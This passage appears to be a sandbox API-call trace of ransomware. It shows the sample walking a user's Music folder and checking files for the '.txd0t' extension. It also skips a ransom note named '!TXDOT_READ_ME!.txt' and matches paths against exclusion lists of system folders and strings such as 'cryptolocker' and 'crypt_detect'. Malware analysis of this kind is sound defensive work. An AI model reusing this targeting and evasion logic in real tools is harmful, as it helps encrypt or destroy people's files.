psz2=".") returned 1 [0090.218] StrCmpW (psz1="o_54eDamWws3.mp3.txd0t", psz2="..") returned 1 [0090.218] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.218] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.218] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="o_54eDamWws3.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\o_54eDamWws3.mp3.txd0t" [0090.218] PathFindExtensionW (pszPath="o_54eDamWws3.mp3.txd0t") returned=".txd0t" [0090.218] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.218] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70852950, ftCreationTime.dwHighDateTime=0x1d5ec0e, ftLastAccessTime.dwLowDateTime=0x6056c510, ftLastAccessTime.dwHighDateTime=0x1d5ef02, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ce3, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="rWrYpfOfe9_Zr8omah.mp3.txd0t", cAlternateFileName="RWRYPF~1.TXD")) returned 1 [0090.218] StrCmpW (psz1="rWrYpfOfe9_Zr8omah.mp3.txd0t", psz2=".") returned 1 [0090.218] StrCmpW (psz1="rWrYpfOfe9_Zr8omah.mp3.txd0t", psz2="..") returned 1 [0090.218] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.218] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.218] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="rWrYpfOfe9_Zr8omah.mp3.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\rWrYpfOfe9_Zr8omah.mp3.txd0t" [0090.218] PathFindExtensionW (pszPath="rWrYpfOfe9_Zr8omah.mp3.txd0t") returned=".txd0t" [0090.218] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.218] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd839f70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2cadb720, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcedd, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Wv1ct5mSPlb.wav.txd0t", cAlternateFileName="WV1CT5~1.TXD")) returned 1 [0090.218] StrCmpW (psz1="Wv1ct5mSPlb.wav.txd0t", psz2=".") returned 1 [0090.218] StrCmpW (psz1="Wv1ct5mSPlb.wav.txd0t", psz2="..") returned 1 [0090.218] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0090.218] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", psz2="\\", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\" [0090.218] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\", psz2="Wv1ct5mSPlb.wav.txd0t", cchMax=1136 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP\\Wv1ct5mSPlb.wav.txd0t" [0090.218] PathFindExtensionW (pszPath="Wv1ct5mSPlb.wav.txd0t") returned=".txd0t" [0090.229] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.229] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd839f70, ftCreationTime.dwHighDateTime=0x1d5ee74, ftLastAccessTime.dwLowDateTime=0x2cadb720, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcedd, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Wv1ct5mSPlb.wav.txd0t", cAlternateFileName="WV1CT5~1.TXD")) returned 0 [0090.229] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0090.229] GetProcessHeap () returned 0xe30000 [0090.229] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecc4e0 | out: hHeap=0xe30000) returned 1 [0090.229] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4468cd60, ftCreationTime.dwHighDateTime=0x1d5efd1, ftLastAccessTime.dwLowDateTime=0x5d990a0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x51df71c4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13f5, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="W-oOtVbhE3qMz.wav.txd0t", cAlternateFileName="W-OOTV~1.TXD")) returned 1 [0090.229] StrCmpW (psz1="W-oOtVbhE3qMz.wav.txd0t", psz2=".") returned 1 [0090.229] StrCmpW (psz1="W-oOtVbhE3qMz.wav.txd0t", psz2="..") returned 1 [0090.229] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0090.229] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0090.229] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="W-oOtVbhE3qMz.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\W-oOtVbhE3qMz.wav.txd0t" [0090.229] PathFindExtensionW (pszPath="W-oOtVbhE3qMz.wav.txd0t") returned=".txd0t" [0090.229] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.229] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e3e230, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xb0dfbc60, ftLastAccessTime.dwHighDateTime=0x1d5ee1e, ftLastWriteTime.dwLowDateTime=0x51e1d481, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b34, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="WDCK.m4a.txd0t", cAlternateFileName="WDCKM4~1.TXD")) returned 1 [0090.229] StrCmpW (psz1="WDCK.m4a.txd0t", psz2=".") returned 1 [0090.229] StrCmpW (psz1="WDCK.m4a.txd0t", psz2="..") returned 1 [0090.229] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0090.229] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0090.229] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="WDCK.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\WDCK.m4a.txd0t" [0090.229] PathFindExtensionW (pszPath="WDCK.m4a.txd0t") returned=".txd0t" [0090.229] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.229] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e3e230, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xb0dfbc60, ftLastAccessTime.dwHighDateTime=0x1d5ee1e, ftLastWriteTime.dwLowDateTime=0x51e1d481, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4b34, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="WDCK.m4a.txd0t", cAlternateFileName="WDCKM4~1.TXD")) returned 0 [0090.229] FindClose (in: hFindFile=0xec22b0 | out: hFindFile=0xec22b0) returned 1 [0090.229] GetProcessHeap () returned 0xe30000 [0090.229] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecaff8 | out: hHeap=0xe30000) returned 1 [0090.229] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5450cdb0, ftCreationTime.dwHighDateTime=0x1d5e2b4, ftLastAccessTime.dwLowDateTime=0x341c2fc0, ftLastAccessTime.dwHighDateTime=0x1d5e440, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcd67, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="VO0C5WvUIA8AyL.m4a.txd0t", cAlternateFileName="VO0C5W~1.TXD")) returned 1 [0090.229] StrCmpW (psz1="VO0C5WvUIA8AyL.m4a.txd0t", psz2=".") returned 1 [0090.230] StrCmpW (psz1="VO0C5WvUIA8AyL.m4a.txd0t", psz2="..") returned 1 [0090.230] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.230] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.230] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="VO0C5WvUIA8AyL.m4a.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\VO0C5WvUIA8AyL.m4a.txd0t" [0090.230] PathFindExtensionW (pszPath="VO0C5WvUIA8AyL.m4a.txd0t") returned=".txd0t" [0090.230] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.230] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="z37nyAMgu2jp3cfWIU", cAlternateFileName="Z37NYA~1")) returned 1 [0090.230] StrCmpW (psz1="z37nyAMgu2jp3cfWIU", psz2=".") returned 1 [0090.230] StrCmpW (psz1="z37nyAMgu2jp3cfWIU", psz2="..") returned 1 [0090.230] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0090.230] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0090.230] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="z37nyAMgu2jp3cfWIU", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\system32\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\system\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\local\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\boot\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\perflogs\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\programdata\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\drivers\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\wsus\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="crypt_detect") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="cryptolocker") returned 0x0 [0090.230] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="ransomware") returned 0x0 [0090.231] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\WINDOWS") returned 0x0 [0090.231] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.231] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", lpSrch="C:\\Program Files") returned 0x0 [0090.231] GetProcessHeap () returned 0xe30000 [0090.231] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d2) returned 0xecaff8 [0090.231] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.231] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\*", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*" [0090.231] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2070 [0090.231] StrCmpW (psz1=".", psz2=".") returned 0 [0090.231] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.231] StrCmpW (psz1="..", psz2=".") returned 1 [0090.231] StrCmpW (psz1="..", psz2="..") returned 0 [0090.231] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e69890, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51e69890, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.231] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.231] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.231] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.231] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0090.231] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\!TXDOT_READ_ME!.txt" [0090.231] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.231] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.231] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.232] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.232] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.232] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.232] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.232] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.232] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f9e610, ftCreationTime.dwHighDateTime=0x1d5ee03, ftLastAccessTime.dwLowDateTime=0x12962240, ftLastAccessTime.dwHighDateTime=0x1d5ed85, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x172c3, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="5YOR.m4a.txd0t", cAlternateFileName="5YORM4~1.TXD")) returned 1 [0090.232] StrCmpW (psz1="5YOR.m4a.txd0t", psz2=".") returned 1 [0090.232] StrCmpW (psz1="5YOR.m4a.txd0t", psz2="..") returned 1 [0090.232] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.232] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0090.232] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="5YOR.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\5YOR.m4a.txd0t" [0090.232] PathFindExtensionW (pszPath="5YOR.m4a.txd0t") returned=".txd0t" [0090.232] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.232] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f1f5210, ftCreationTime.dwHighDateTime=0x1d5ef33, ftLastAccessTime.dwLowDateTime=0x5213e9a4, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="7k19qHZKQ", cAlternateFileName="7K19QH~1")) returned 1 [0090.232] StrCmpW (psz1="7k19qHZKQ", psz2=".") returned 1 [0090.232] StrCmpW (psz1="7k19qHZKQ", psz2="..") returned 1 [0090.232] StrCpyNW (in: psz1=0xecaff8, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0090.232] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0090.232] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="7k19qHZKQ", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\system32\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.232] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", lpSrch="\\windows\\system\\") returned 0x0 